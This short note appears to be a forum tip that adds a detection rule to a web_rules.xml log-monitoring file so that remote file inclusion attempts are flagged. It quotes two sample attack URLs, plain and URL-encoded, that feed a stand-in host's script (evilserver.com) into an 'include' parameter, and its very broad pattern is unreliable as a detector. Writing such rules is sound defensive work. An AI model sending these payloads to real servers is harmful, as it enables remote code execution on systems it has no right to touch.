on web_rules.xml (add ~ line 46)
<url>%3A|%2F|:|/</url>
for block as a XSS attack or a SQL attack log type:
http://mywebsite.com/vulnerable_script.php?include=http://evilserver.com/evil_script.txt
http://mywebsite.com/vulnerable_script.php?include=http%3a%2f%2fevilserver.com%2fevil_script.txt( for block many script kiddy from: http://www.milw0rm.com/search.php?dong=include )
